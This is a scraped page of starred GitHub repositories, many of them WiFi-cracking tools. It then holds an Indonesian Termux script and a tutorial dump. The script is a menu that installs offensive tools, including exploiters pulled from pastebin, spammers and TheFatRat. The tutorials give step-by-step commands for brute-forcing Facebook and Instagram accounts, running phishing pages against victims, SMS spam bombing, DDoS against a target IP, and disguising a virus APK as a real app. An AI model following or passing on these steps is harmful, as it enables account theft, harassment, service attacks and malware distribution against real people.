ZeLo's starred repositories





A lightweight, dependency-free Python library (and command-line utility) for downloading YouTube Videos.






The starter kit provides the Asp.Net MVC controllers, models, and views needed to administer users & roles.



使用Spring Boot开发的简易会员管理系统



(2015) Zenbership Membership Software: Achieve Membership Nirvana



Automatically exported from code.google.com/p/fern-wifi-cracker



Android application to brute force WiFi passwords without requiring a rooted device.



Flux is a [WIFI CRACKER]



Easy WiFi setup for Linux devices from your mobile phone or laptop



Repository for the wifidog-gateway captive portal designed for embedded systems






How to get free wifi.






DEPRECATED, wifipumpkin3 -> https://github.com/P0cL4bs/wifipumpkin3



FruityWiFi is a wireless network auditing tool. The application can be installed in any Debian based system (Jessie) adding the extra packages. Tested in Debian, Kali Linux, Kali Linux ARM (Raspberry Pi), Raspbian (Raspberry Pi), Pwnpi (Raspberry Pi), Bugtraq, NetHunter.



A full functional WiFi Repeater (correctly: a WiFi NAT Router)



ESP8266 WiFi Connection manager with web captive portal



The Swiss Army knife for 802.11, BLE, IPv4 and IPv6 networks reconnaissance and MITM attacks.



The Rogue Access Point Framework



Crack WPA/WPA2 Wi-Fi Routers with Airodump-ng and Aircrack-ng/Hashcat



#!/bin/bash # Auto Install Tools v.2.1 # recoded By Satrio Kusbiyantoro # gausah ganti copyright kalo mau di hargai :) # Bersihkan Layar clear blue='\e[0;34' cyan='\e[0;36m' green='\e[0;34m' okegreen='\033[92m' lightgreen='\e[1;32m' white='\e[1;37m' red='\e[1;31m' yellow='\e[1;33m' ################################################### # CTRL C ################################################### trap ctrl_c INT ctrl_c() { clear echo -e $red"[#]> (Ctrl + C ) Detected, Trying To Exit ... " sleep 1 echo "" echo -e $green"[#]> SMKN 1 Kertosono ... " sleep 1 echo "" echo -e $white"[#]> Satrio Kusbiyantoro Wuzz Here ... " read enter exit } echo -e $red" ___ ___ _______ ____ ____ " echo -e $red" / / \ | | | | | | echo -e $white" /__ /_____\ | | __| | | |" echo -e $white" / /_______\ | | \ | | |" echo -e $red" ___/ / \ | | \ | |____|" echo -e $red" ***********************************************" echo -e $white" # $red toolkit for hackers v2.1 $white #" echo -e $red" # $red happy fun guys $red #" echo -e $white" # $red contact: erik_susanto30@yahoo.com $white #" echo -e $red" # $white greetz :Kesendirian Nak SMKN 1 Kertosono $red#" echo -e $white" # $white copyright : Satrio Kusbiyantoro $white #" echo -e $red" # $white thanks to : SMKN 1 Kertosono $red #" echo -e $white" ***********************************************" echo "" echo -e $green" 01) Red Hawk" echo -e $green" 02) D-Tect" echo -e $green" 03) Hunner" echo -e $green" 04) WPScan" echo -e $green" 05) Webdav" echo -e $green" 06) Metasploit" echo -e $green" 07) Kali Nethunter" echo -e $green" 08) Ubuntu" echo -e $green" 09) viSQL " echo -e $green" 10) Ngrok" echo -e $green" 11) Torshammer " echo -e $green" 12) RouterSploit " echo -e $green" 13) Hydra " echo -e $green" 14) Weevely " echo -e $green" 15) SQLMap " echo -e $green" 16) Dirbuster " echo -e $green" 17) admin finder " echo -e $green" 18) lokomedia exploiter " echo -e $green" 19) elfinder exploiter " echo -e $green" 20) magento add admin exploiter " echo -e $green" 21) scanner tools " echo -e $green" 22) katoolin " echo -e $green" 23) arch linux " echo -e $green" 24) linux fedora" echo -e $green" 25) hash-buster" echo -e $green" 26) aircrack-ng" echo -e $green" 27) joomscan" echo -e $green" 28) mailer sender cli" echo -e $green" 29) Wordpress Brute Force" echo -e $green" 30) Oh-myzsh theme for termux" echo -e $green" 31) instabot (instagram bot)" echo -e $green" 32) fsociety" echo -e $green" 33) Cms Scanner" echo -e $green" 34) Information Gathering" echo -e $green" 35) com_fabrik exploiter" echo -e $green" 36) com foxcontact exploiter" echo -e $green" 37) installing ezsploit" echo -e $green" 38) installing spammer grab" echo -e $green" 39) installing spammer toko pedia" echo -e $green" 40) TheFatRat" echo -e $green" 41) exit" echo -e $green" 40) exit" echo -e $white"" read -p "[Satrio Kusbiyantoro]> " bct; if [ $bct = 01 ] || [ $bct = 01 ] then clear echo -e $green" Installing Red Hawk " sleep 1 apt update && apt upgrade apt install php apt install git git clone https://github.com/Tuhinshubhra/RED_HAWK echo -e $green" Done Install Cuk " fi if [ $bct = 02 ] || [ $bct = 02 ] then clear echo -e $green" Installing D-Tect " sleep 1 apt-get update && apt-get upgrade apt-get install git apt-get install python git clone https://github.com/shawarkhanethicalhacker/D-TECT echo -e $red" Done Install ^_^ " fi if [ $bct = 03 ] || [ $bct = 03 ] then clear echo -e $green" Installing Hunner " sleep 1 apt-get update && apt-get upgrade apt install python apt install git git clone https://github.com/b3-v3r/Hunner echo -e $red" Done Install ^_^ " fi if [ $bct = 04 ] || [ $bct = 04 ] then clear echo -e $green" Installing Wpscan " sleep 1 apt-get update && apt-get upgrade apt install ruby apt install curl apt install git git clone https://github.com/wpscanteam/wpscan cd ~/wpscan gem install bundle bundle config build.nokogiri --use-system-libraries bundle install ruby wpscan.rb --update cd ~/ echo -e $red" Done Install ^_^ " fi if [ $bct = 05 ] || [ $bct = 05 ] then clear echo -e $green" Installing Webdav " sleep 1 apt update && apt upgrade apt install python apt-get install python-pip pip2 install urllib3 chardet certifi idna requests apt install openssl curl pkg install libcurl mkdir webdav cd ~/webdav wget https://pastebin.com/raw/HnVyQPtR -O webdav.py chmod 777 webdav.py cd ~/ echo -e $red" Done Install ^_^ " fi if [ $bct = 06 ] || [ $bct = 06 ] then clear echo -e $green" Installing Metasploit " sleep 1 apt update && apt upgrade apt install git apt install wget wget https://raw.githubusercontent.com/verluchie/termux-metasploit/master/install.sh chmod 777 install.sh sh install.sh echo -e $red" Done Install ^_^ " fi if [ $bct = 07 ] || [ $bct = 07 ] then clear echo -e $green" Installing Kali Nethunter " sleep 1 apt update && apt upgrade apt install git git clone https://github.com/Hax4us/Nethunter-In-Termux.git cd ~/Nethunter-In-Termux chmod 777 kalinethunter sh kalinethunter echo -e $red" Done Install ^_^ " fi if [ $bct = 08 ] || [ $bct = 08 ] then clear echo -e $green" Installing Ubuntu " sleep 1 apt update && apt upgrade apt install git apt install wget apt install proot git clone https://github.com/Neo-Oli/termux-ubuntu.git cd ~/termux-ubuntu chmod +x ubuntu.sh sh ubuntu.sh echo " Fix network please wait " sleep 1 echo "nameserver" > /data/data/com.termux/files/home/termux-ubuntu/ubuntu-fs/etc/resolv.conf echo -e $red" Done Install ^_^ " fi if [ $bct = 09 ] || [ $bct = 09 ] then clear echo -e $green" Installing viSQL " sleep 1 apt update && apt upgrade pkg install git pkg install python git clone https://github.com/blackvkng/viSQL.git cd ~/viSQL chmod 777 viSQL.py cd ~/ echo -e $red" Done Install ^_^ " fi if [ $bct = 10 ] || [ $bct = 10 ] then clear echo -e $green" Installing Ngrok " sleep 1 apt install wget mkdir ngrok cd ~/ngrok wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-arm.zip unzip ngrok-stable-linux-arm.zip cd ~/ echo -e $red" Done Install ^_^ " fi if [ $bct = 11 ] || [ $bct = 11 ] then clear echo -e $green" Installing Hammer " sleep 1 pkg update pkg upgrade pkg install python pkg install git git clone https://github.com/cyweb/hammer cd ~/ echo -e $red" Done Install ^_^ " fi if [ $bct = 12 ] || [ $bct = 12 ] then clear echo -e $green" Installing Routersploit " sleep 1 apt install git apt install python2 pip2 install requests git clone https://github.com/reverse-shell/routersploit.git cd routersploit pip install -r requirements.txt termux-fix-shebang rsf.py cd ~/ echo -e $red" Done Install ^_^ " fi if [ $bct = 13 ] || [ $bct = 13 ] then clear echo -e $green" Installing Hydra " sleep 1 apt update && apt install -y wget apt install hydra wget http://scrapmaker.com/download/data/wordlists/dictionaries/rockyou.txt cd ~/ echo -e $red" Done Install ^_^ " fi if [ $bct = 14 ] || [ $bct = 14 ] then clear echo -e $green" Installing Weevely " sleep 1 pkg update pkg upgrade git clone https://github.com/glides/Weevely cd ~/ echo -e $red" Done Install ^_^ " fi if [ $b ct = 15 ] || [ $bct = 15 ] then clear echo -e $green" Installing SQLMap " sleep 1 apt update && apt upgrade apt install python2 git clone https://github.com/sqlmapproject/sqlmap.git cd ~/ echo -e $red" Done Install ^_^ " fi if [ $bct = 16 ] || [ $bct = 16 ] then clear echo -e $green" Installing Dirbuster " sleep 1 apt-get update apt-get install python apt-get install git git clone https://github.com/maurosoria/dirsearch.git cd ~/ echo -e $red" Done Install ^_^ " fi if [ $bct = 17 ] || [ $bct = 17 ] then clear echo -e $green" Installing admin finder " sleep 1 apt update && apt upgrade apt-get install php mkdir adfin cd ~/webdav wget https://pastebin.com/raw/32txZ6Qr -O adfin.php cd ~/ echo -e $red" Done Install ^_^ " fi if [ $bct = 18 ] || [ $bct = 18 ] then clear echo -e $green" installing lokomedia exploiter " sleep 1 apt update && apt upgrade apt-get install php mkdir lokomed cd ~/lokomed wget https://pastebin.com/raw/sPpJRjCZ -O lokomedia.php cd ~/ echo -e $red" Done Install ^_^ " echo -e $red" usage : php lokomedia.php a.txt " fi if [ $bct = 19 ] || [ $bct = 19 ] then clear echo -e $green" installing elfinder exploiter " sleep 1 apt update && apt upgrade apt-get install php mkdir elfinder cd ~/elfinder wget https://pastebin.com/raw/S7Y2V19h -O elfinder.php cd ~/ echo -e $red" Done Install ^_^ " fi if [ $bct = 20 ] || [ $bct = 20 ] then clear echo -e $green" installing magento add admin exploiter " sleep 1 apt update && apt upgrade apt-get install php mkdir magento cd ~/magento wget https://pastebin.com/raw/PXkG73pG -O magento.php cd ~/ echo -e $red" Done Install ^_^ " fi if [ $bct = 21 ] || [ $bct = 21 ] then clear echo -e $green" installing scanner tools " sleep 1 apt update && apt upgrade apt install python mkdir scanner cd ~/scanner wget https://pastebin.com/raw/m79t1Zia -O scanner.py wget https://pastebin.com/raw/mgKxMWXh -O admins.1337 wget https://pastebin.com/raw/EafKj98D -O files.1337 cd ~/ echo -e $red" Done Install ^_^ " echo -e $red" usage : python2 scanner.py site.com -m files " fi if [ $bct = 22 ] || [ $bct = 22 ] then clear echo -e $green" installing katoolin " sleep 1 apt update && apt upgrade pkg install git pkg install python pkg install gnupg pkg install nano git clone https://github.com/LionSec/katoolin.git cd ~/katoolin echo -e $green"note : nano katoolin.py ganti semua kode /etc/apt/source.list dengan /data/data/com.termux/files/usr/etc/apt/sources.list kemudian simpan dengan menekan ctrl O enter kemudian ctrl X . jika tidak ada menu ctrl pada keyboard munculkan dengan menahan tombol volume atas kemudian ketik Q pada keyboard maka menu ctrl akan muncul di atas keyboard python2 katoolin.py Sisanya bisa mengikuti cara install di atas, Jika menemui masalah gpg error saat melakukan add repository install gnupg-curl dengan perintah pkg install gnupg-curl Untuk yg menggunakan termux dengan cpu arm64 (aarch64) tidak bisa menambahkan repositori kali linux karna kali linux tidak support aarch64, jadi sebelum menginstall tools kali di termux wajib dengan android dengan arm32 jika arm64 gunakan gnuroot" echo -e $red" Done Install ^_^ " fi if [ $bct = 23 ] || [ $bct = 23 ] then clear echo -e $green" installing arch linux " sleep 1 apt update && apt upgrade apt-get install git cd ~/ git clone https://github.com/sdrausty/termux-archlinux.git cd termux-archlinux chmod +x setupTermuxArch.sh ./setupTermuxArch.sh echo -e $red" Done Install ^_^ " fi if [ $bct = 24 ] || [ $bct = 24 ] then clear echo -e $green" installing fedora " sleep 1 apt update && apt upgrade apt-get install git apt install wget git clone https://github.com/nmilosev/termux-fedora.git cd termux-fedora chmod +x termux-fedora.sh echo -e $red" Done Install ^_^ " fi if [ $bct = 25 ] || [ $bct = 25 ] then clear echo -e $green" installing hash-Buster " sleep 1 apt update && apt upgrade apt install python2 && apt install git git clone https://github.com/UltimateHackers/Hash-Buster cd Hash-Buster echo -e $red" Done Install ^_^ " fi if [ $bct = 26 ] || [ $bct 26 ] then clear echo -e $green" installing aircrack-ng " sleep 1 apt-get update && apt-get upgrade apt-get install aircrack-ng echo -e $red" done install ^_^ " fi if [ $bct = 27 ] || [ $bct = 27 ] then clear echo -e $green" installing joomscan " sleep 1 apt-get update && apt-get upgrade apt-get install git apt-get install perl git clone https://github.com/rezasp/joomscan.git echo -e $red" done install ^_^ " fi fi if [ $bct = 28 ] || [ $bct = 28 ] then clear echo -e $green" installing mailer-sender " sleep 1 apt-get update && apt-get upgrade apt-get install php5-cli curl -sS https://getcomposer.org/installer | php chmod +x composer.phar sudo mv composer.phar /usr/bin/composer git clone https://github.com/pedro-stanaka/mailer-cli.git echo -e $red" note !! " echo -e $red" usage php sendmail.php notification:mailer <email> <subject> <body>; " echo -e $red" or " echo -e $red" php sendmail.php --help " echo -e $red" done install ^_^ " fi if [ $bct = 29 ] || [ $bct = 29 ] then clear echo -e $green" installing wordpress brute force " sleep 1 apt-get update && apt-get upgrade apt-get install python apt-get install python-pip pip install request git clone https://github.com/atarantini/wpbf echo -e $red" done install ^_^ " fi if [ $bct = 30 ] || [ $bct = 30 ] then clear echo -e $green" installing termux Ohmyzsh " sleep 1 apt-get update && apt-get upgrade sh -c "$(curl -fsSL https://github.com/Cabbagec/termux-ohmyzsh/raw/master/install.sh)" ~/.termux/colors.sh echo -e $red" ganti color ? ketik ~/.termux/colors.sh " echo -e $red" Done Install ^_^ " fi if [ $bct = 31 ] || [ $bct = 31 ] then clear echo -e $green" installing Instabot instagram bot " sleep 1 apt-get update && apt-get upgrade pkg install python apt-get install git apt-get install nano git clone https://github.com/instabot-py/instabot.py echo -e $red" Done Install ^_^ " echo -e $red" Please wait... " echo -e $red" Please wait... " sleep 1 cd instabot.py echo -e $red" ketik nano example.py " echo -e $red" masukan username dan password mu" echo -e $red" Done Install ^_^" fi if [ $bct = 32 ] || [ $bct = 32 ] then clear echo -e $green" installing fsociety " sleep 1 apt-get update && apt-get upgrade pkg install python apt-get install git git clone https://github.com/Manisso/fsociety echo -e $red" Done Install ^_^ " echo -e $red" Please wait... " echo -e $red" Please wait... " sleep 1 cd fsociety echo -e $red" python fsociety.py " fi if [ $bct = 33 ] || [ $bct = 33 ] then clear echo -e $green" installing CMS Scanner " sleep 1 apt-get update && apt-get upgrade pkg install python apt-get install git git clone https://github.com/Dionach/CMSmap.git sleep 1 cd CMSmap echo -e $red" Usage: cmsmap.py -t <URL> " fi if [ $bct = 34 ] || [ $bct = 34 ] then clear echo -e $green" installing INFORMATION Gathering " sleep 1 apt-get update && apt-get upgrade pkg install python apt-get install git git clone https://github.com/m4ll0k/Infoga.git infoga sleep 1 cd infoga pip install -r req echo -e $red" Usage: python infoga.py " fi if [ $bct = 35 ] || [ $bct = 35 ] then clear echo -e $green" installing com fabrik exploiter " sleep 1 apt-get update && apt-get upgrade apt-get install wget apt-get install php wget https://pastebin.com/raw/LDvFvtUD -O com_fabrik.php sleep 1 echo -e $red" Usage: php com_fabrik.php target.txt " fi if [ $bct = 36 ] || [ $bct = 36 ] then clear echo -e $green" installing com foxcontact exploiter " sleep 1 apt-get update && apt-get upgrade apt-get install wget apt-get install php wget https://pastebin.com/raw/EAtSir5V -O com_foxcontact.php sleep 1 echo -e $red" Usage: php com_foxcontact.php target.txt " fi if [ $bct = 37 ] || [ $bct = 37 ] then clear echo -e $green" installing ezsploit " sleep 1 apt-get update && apt-get upgrade apt-get install git git clone https://github.com/rand0m1ze/ezsploit sleep 1 echo -e $red" Done Install ^_^ " fi if [ $bct = 38 ] || [ $bct = 38 ] then clear echo -e $green" installing spammer grab " sleep 1 apt-get update && apt-get upgrade apt-get install git apt-get install python pip install requests git clone https://github.com/p4kl0nc4t/Spammer-Grab/ sleep 1 echo -e $red" Done Install ^_^ " fi if [ $bct = 39 ] || [ $bct = 39 ] then clear echo -e $green" installing spammer toko pedia " sleep 1 apt-get update && apt-get upgrade apt-get install git apt-get install unzip git clone https://github.com/mrcakil/spam cd spam unzip toko-pedia.zip sleep 1 echo -e $red" Done Install ^_^ " fi if [ $bct = 40 ] || [ $bct = 40 ] then clear echo -e $green" installing TheFatRat " sleep 1 apt-get update && apt-get upgrade apt-get install git git clone https://github.com/Screetsec/TheFatRat.git cd TheFatRat chmod +x setup.sh && ./setup.sh sleep 1 echo -e $red" Done Install ^_^ " fi if [ $bct = 41 ] || [ $bct = 41 ] then echo -e $green" pesan terakhir " sleep 1 echo -e $green" dear jomblo " sleep 1 echo -e $green" Jangan Hina Orang " sleep 1 echo -e $green" Please Wait.... " sleep 1 echo -e $green" contact : 082335546357 " sleep 1 echo -e $blue" fb : https://www.facebook.com/profile.php?id=100009867736195 " sleep 1 echo -e $red" SMKN 1 Kertosono :* " sleep 1 exit fi



1.[Script Termux] -Cmatrix *apt-get update *apt-get upgrade *apt-get install nmap *apt-get install python *apt-get install list *apt-get install cmatrix *cmatrix [1/11 18.28] ‪+62 821-2770-8489‬: ✓Mempercantik Termux $ pkg update && pkg upgrade $ pkg install ruby cowsay toilet figlet $ pkg install neofetch $ pkg install nano $ gem install lolcat $ cd ../usr/etc $ nano bash.bashrc cowsay -f eyes Cyber | lolcat toilet -f standard Indonesia -F gay neofetch date | lolcat Hack FB rombongan $ apt update && apt upgrade $ pkg install python2 git $ pip2 install mechanize $ git clone http://github.com/pirmansx/mbf $ ls $ cd mbf $ python2 MBF.py Hack FB ngincer $ apt update ( Enter ) $ apt upgrade ( Enter ) $ apt install python2 ( Enter ) $ pip2 install urllib3 chardet certifi idna requests ( Enter ) $ apt install openssl curl ( Enter ) $ pkg install libcurl ( Enter ) $ ln /sdcard ( Enter ) $ cd /sdcard ( Enter ) $ python2 fbbrute.py ( Enter ) Hack Gmail apt-get update && apt-get upgrade $ apt-get install git $ apt-get install python python-pip python-setuptools $ pip install scapy $ git clone https://github.com/wifiphisher/wifiphisher.git $ cd wifiphisher< $ python setup.py install $ cd wifiphisher $ python wifiphisher Nih yang mau hack WiFi Khusus root $apt update $apt upgrade $apt install git $git clone https://github.com/esc0rtd3w/wifi-hacker $ls $cd wifi-hacker $ls $chmod +x wifi-hacker.sh $ls $./wifi-hacker.sh ✓ *ni tutor dari gua* TOOL TERMUX LENGKAP ⭕⭕⭕⭕⭕⭕⭕⭕⭕⭕⭕⭕⭕⭕ Command Termux Hacking...... by:🎭ঔৣஓMuslimCyberSquadঔৣஓீ🎭 ⭕⭕⭕⭕⭕⭕⭕⭕⭕⭕⭕⭕⭕⭕ cara uninstall tool termux rm -rf toolsnya Bermain moon-buggy $ pkg install moon-buggy $ moon-buggy CHATTING VIA TERMUX irssi /connet irc.freenode.net /nick w3wandroid /join #modol $ pkg install irssi $ irssi $ /connect chat.freenode.net $ /nick 1235 12345 di ganti sesuai nama/nick agan $ /join #XCAteam PERKIRAAN cuaca curl http://wttr.in/ (lokasi) Browsing di termux $ pkg install w3m $ w3m www.google.com Linknya bsa diubah Telephone di termux $ pkg install termux-api $ termux-telephony-call nomornya Menampilkan animasi kereta :v $ pkg install sl $ sl menampilkan ikon dan informasi sistem android $ pkg install neofetch $ neofetch menampilkan teks dalam format ASCII $ pkg install figlet $ figlet masukin teksnya MEMUTAR MUSIC DI YOUTUBE VIA TERMUX $ pip install mps_youtube $ pip install youtube_dl $ apt install mpv $ mpsyt $ /judul lagu Tinggal pilih lagu dengan mengetik nomornya musikan di termux $ pkg install mpv $ mpv/sdcard/lagu.mp3 /sdcard/ bisa di ganti sesuai letak music CRACK PASSWORD HASH $ git clone https://github.com/FajriHidayat088/FHX-Hash-Killer/ $ cd FHX-Hash-Killer $ python2 FHXHashKiller.py $ git clone https://github.com/UltimateHackers/Hash-Buster $ cd Hash-Buster $ python2 hash.py ASCII ART MAPS​​​ - pkg install update && upgrade - pkg install perl - git clone https://github.com/x-xsystm/maps.git - cd maps - perl maps.pl - untuk Zoom tekan ​A​ - Password: ​(pejuang212)​ CARA MENGHIAS TAMPILAN TERMUX TOXIC TEAM $ pkg update && pkg upgrade $ pkg install ruby cowsay toilet figlet $ pkg install neofetch $ pkg install nano $ pkg install ncurses-utils $ pkg install ruby $ pkg install lolcat $ pkg install cowsay $ gem install lolcat $ nano .bashrc clear blue='\e[1;34m' green='\e[1;32m' purple='\e[1;35m' cyan='\e[1;36m' red='\e[1;31m' white='\e[1;37m' yellow='\e[1;33m' NOW=`date "+%d.%m.%Y"` TIME=`date "+%H:%M"` cowsay -f eyes **Welcome To TOXIC hacking tool** | lolcat toilet -f standard " **TOXIC** " -F gay neofetch echo " Time : " $TIME | lolcat date | lolcat echo echo Username : Cyber | lolcat echo Hostname : TOXIC | lolcat echo echo @localhost:~# | lolcat echo root@localhost:~$ | lolcat echo -e $green echo root@CYBER:~$ TUTORIAL MEMBUAT VIRUS SEPERTI APLIKASI ASLINYA Tools yang dibutuhkan: APK Editor & tool vbug APK Editor bisa didownload di playstore Tool vbug https://www.mediafire.com/file/6hs6y71ryw10uvw/vbug.zip 1. Download tool vbugnya dulu 2. Taruh file tool vbug di luar folder pada memori internal 3. Buka termux lalu $ cd /sdcard 4. $ unzip vbug.zip 5. $ cd vbug 6. $ python2 vbug.py 7. Enter 8. Ketik 10 9. Ketik E 10. Aplikasi virusnya sudah jadi Setelah aplikasinya jad kita tinggal edit supaya mirip aslinya 1. Buka APK Editor 2. Klik Select an Apk File 3. Pilih aplikasi virus tadi 4. Klik full edit 5. Pada bagian kolom app_name tulis nama aplikasi yang kalian inginkan 6. Lalu klik files 7. Klik res/drawable 8. Logo yang kedua itu ganti dengan logo aplikasi yang kalian inginkan Catatan: format logo harus .png 9. Ceklist logo yang kedua lalu replace 10. Pilih file logo yang mau dijadikan logo aplikasi agan 11. Back sampai home Supaya aplikasi terlihat lebih nyata kita harus beri bobot pada aplikasi buatan kita 12. Klik tanda plus yang ada di bawah kiri, pilih file, lagu, gambar atau apapun yang coxok sebagai bobot apliaksi agan 13. Klik build 14. Tunggu hingga selesai 15. Jadi deh VBugMaker Termux -apt update && apt upgrade -apt install git -apt install python Donwload file ->http://upfile.mobi/YGwg8gQLuvv Pindah ke directory Next -unzip vbug.zip -mv vbug $HOME -cd vbug -ls -chmod +x vbug.py -python2 vbug.py #Done BOOM SPAM DI TERMUX apt upgrade && apt update apt install git git clone https://github.com/Amriez/gcospam cd gcospam sh install.sh sh gco.sh Pilih nomer yang mana ajjh Lalu Masukan nomer tanpa 0/62 Input bebas Jeda default aja Spam bom mall $ pkg install update $ pkg install upgrade $ pkg install wget $ pkg install php $ wget http://files-store.theprivat.ml/uploads/bom-mall.zip $ unzip bom-mall.zip $ cd bom-mall $ php run.php (Install *SpamTsel*) $ pkg install curl $ pkg install php $ curl -s http://files-store.theprivat.ml/uploads/bombtsel.txt > bombtsel.php $ chmod 777 bombtsel.php $ php bombtsel.php 3) Tool Spam LITESPAM $ pkg install php $ pkg install toilet $ pkg install sh LITESPAM $ pkg install git $ git clone https://github.com/4L13199/LITESPAM $ cd LITESPAM $ sh LITESPAM.sh atau bash LITESPAM.sh Masukan Nomer nya... Spammer GRAB $pkg install python2 $pip2 install requests $pkg install git $git clone http://github.com/p4kl0nc4t/Spammer-Grab $cd Spammer-Grab $python2 spammer.py nomor hp korban --delay 30 ‌spam sms jdid 1.PKG install PHP 2.pkg install cURL 3.curl https://pastebin.com/raw/9BYy1 JVc -o jdid.php 4.php jdid.php Hacking spammer by seni $apt update && apt upgrade $apt install python2 php $pip2 install requests $apt install nano $apt install git $git clone https://github.com/Senitopeng/ SpamSms.git $cd SpamSms $python2 mantan.py HACKING DAN TRICK FB VIA TERMUX AUTO BOOT FACEBOOK $ git clone https://github.com/Senitopeng/BotFbBangDjon.git $ cd BotFbBangDjon $ python2 bangdjon.py Cara crack id fb https://findmyfbid.in/ git clone https://github.com/tomiashari/fb-autoreaction.git cd fb-autoreaction python2 fb-autoreaction HACKING THOOLS MBF FACEBOOK $ pkg update && upgrade ‬$ pkg update && upgrade $ pkg install python2 $ pkg install git $ git clone https://github.com/pirmansx/mbf $ cd mbf $ python2 MBF.py (HACKING FB LEWAT TERMUX) $ apt update $ apt upgrade $ apt install python2 $ apt install python2-dev $ apt install wget $ dip2 install mechanize $ cd/sterage/emulated/0 $ python2 fbbrute.py ( yg tdi di download di tunda di luar folder ) $ storage/emulated/0/fassword.txt ( sama kya yang tadi di download trus tinda di luar folder ) =tinggal tunggu fassword nya muncul Jika beruntung BRUTEFORCE $ apt update $ apt upgrade $ apt install python $ apt install pip $ pip install wordlist $ apt install worlist $ Wordlist -h $ cd /sdcard $ Cat pas.txt FACEBOOK BRUTO FORCE $ apt update $ apt upgrade $ apt install python2 $ apt install python2-dev $ apt install wget $ pip2 install mechanize $ cd/storage/emulated/0 $ python2 fbbrute.py $ storage/emulated/0/password.txt Hacking tool weeman $ apt-get update $ apt-get upgrade $ pkg install python2 $ pkg install git $ git clone https://github.com/evait-security/weeman.git $ ls $ cd weeman $ ls $ python2 weeman.py $ show $set url https://www.facebook.com $set action_url https://www.facebook.com $ show buka new season (new tab) /lembar ke 2 $ ifconfig jika slesai copy no addres yg tertera. jngn sampai salah karna ada 2 addres disitu. jika tdk tau yg mna tanya. stelah copy no adres. buka lembar pertama lagi tulis $ run kasih adres tdi ke target. contoh ingt hrus ksh port > :8080 jika sudah dibuka dngn dia. saat dia login nnti. email. pass. tertera. serta data" akun target.... hacking fbbrute2 by decsec $ apt update (enter) $ apt upgrade (enter) $ apt install python2 (enter) $ apt install wget (enter) $ pip2 install mechanize (enter) $ cd /sdcard (enter) $ mkdir facebrute (enter) $ cd facebrute (enter) $ wget http://override.waper.co/files/facebook.apk $ wget http://override.waper.co/files/password.apk $ mv facebook.apk facebook.py (enter) $ mv password.apk password.txt (enter) $ python2 facebook.py (enter) #Selesai *note: Untuk masalah wordlist bisa buat sendiri kok ^^. Buat sendiri lebih efektif... hacking fbbrute3 $ Apt update ( Enter ) $ Apt upgrade ( Enter ) $ Apt install python2 ( Enter ) $ Pip2 install urllib3 chardet certifi idna requests( Enter ) $ Apt install openssl curl ( Enter ) $ Pkg install libcurl ( Enter ) $ Ln -s/sdcard ( Enter ) $ cd sdcard ( Enter ) $ Python2 fb.py ( Enter ) Hacking Botkomena fb $pkg update && pkg upgrade $pkg install git $pkg install python2 $pip2 install mechanize $git clone https://github.com/Senitopeng/ Botkomena.git $cd Botkomena $python2 botkomena.py Cara Install OSIF ( Open Source Information Facebook ) $ pkg install python2 $ git clone https://github.com/ciku370/OSIF $ cd OSIF $ pip2 install -r requirements.txt Dan cara menjalankannya menggunakan perintah : python2 osif.py weemen 1.download dulu termux 2.instal termux :V 3.ketik apt install git python2 4.ketik git clone https://github.com/evait-security/weeman.git 5.ketik cd weeman 6.ketik python2 weeman.py kalau udh ke install seperti ini 1.ketik set url https://m.facebook.com 2.ketik set action_url https://m.facebook.com/login 3.ketik run Kalau sudah begini . ketik pada browser maka web pishing yg di buat tadi sudah jadi lalu lemparkan ke target link lalu kalau korban terjebak , di mana email dan password nya ? masuk dalam termux jangan di tutup weeman tidak hanya dapat di gunakan sebagai media pishing facebook saja. kita juga dapat membuat web pishing situs lainya misalnya twitter instagram dll asal memiliki/terdapat form input Hacking instagram $ apt update && apt upgrade -y $ apt install nodejs git $ cd Instagram-Private-Tools $ node index.js $ git clone https://github.com/ccocot/Instagram-Private-Tools.git $ npm install *HACK INSTAGRAM* ( sosial engineering) $ apt update && apt upgrade $ pkg install python $ pkg install git $ pkg install nano $ git clone https://github.com/avramit/instahack.git $ ls $ cd instahack $ ls $ pip install requests $ cd instahack $ nano pass.txt $ cat pass.txt $ ls $ python hackinsta.py Localizar ip Apt install python git git clone https://github.com/maldevel/IPGeoLocation.git cd IPGeoLocation chmod +x ipgeoLocation.py pip install -r requirements.txt python ipgeolocation.py -m python ipgeolocation.py -t http://www.google.com Lacak IP git clone https://github.com/maldevel/IPGeolocation cd IPGeolocation chmod +x ipgeolocation.py pip install -r requirements.txt python ipgeolocation.py -m python ipgeolocation.py -t IP yang ingin dilacak TOOL DDOS VIA TERMUX 1. Hammer $ pkg update (tekan enter) $ pkg upgrade (tekan enter) $ pkg install python (tekan enter) $ pkg install git (tekan enter) $ git clone https://github.com/cyweb/hammer (tekan enter) $ cd hammer (tekan enter) $ python hammer.py (tekan enter) $ python hammer.py -s [IP target] -p [port] -t 135 (tekan enter) 2. Xerxes $ apt install git $ apt install clang $ git clone https://github.com/zanyarjamal/xerxes $ ls $ cd xerxes $ ls $ clang xerxes.c -o xerxes $ ls $ ./xerxes (nama website) 80 3. Torshammer $ pkg update $ pkg install git $ apt install tor $ pkg install python2 $ git clone https://github.com/dotfighter/torshammer.git $ ls $ cd torshammer $ python2 torshammer.py 4. liteDDOS $ apt update $ apt upgrade $ pkg install git $ pkg install python2 $ git clone https://github.com/4L13199/LITEDDOS $ cd LITEDDOS $ python2 liteDDOS.py RED_HAWK tool $ apt update $ apt install git $ git clone https://github.com/Tuhinshubhra/RED_HAWK $ cd RED_HAWK $ chmod +x rhawk.php $ apt install php $ ls $ php rhawk.php ‌```Install webdav ``` $ apt update && upgrade $ apt install python2 $ pip2 install urllib3 chardet certifi idna requests $ apt install openssl curl $ pkg install libcurl $ ln -s /sdcard $ cd sdcard $ mkdir webdav $ cd webdav ‌Tutorial Install *Tools-B4J1N64Nv5* pkg install update pkg install git pkg install toilet pkg install figlet pip2 install lolcat git clone https://github.com/DarknessCyberTeam/B4J1N64Nv5 cd B4J1N64Nv5 sh B4J1N64N.sh ‌cara install termux ubuntu - apt update/pkg update - apt upgrade/pkg upgrade - pkg install git - pkg install proot - pkg install wget - git clone https://github.com/Neo-Oli/termux-ubuntu - cd termux-ubuntu - chmod +x ubuntu.sh - pip install -r requirements.txt - ./ubuntu.sh Untuk menjalankan - ./start.sh Cara install github tembak XL Dari awal 1.pkg upgrade 2.pkg update 3.pkg install git 4.pkg install python 5.git clone https://github.com/albertoanggi/xl-py 6.pip install -r requirements.txt 7.chmod +x app.py 8.python/python2 app.py *Install admin finder in termux* $ apt update && apt upgrade $ pkg install python2 $ pkg install git $ git clone https://github.com/AdheBolo/AdminFinder *Menjalankan* 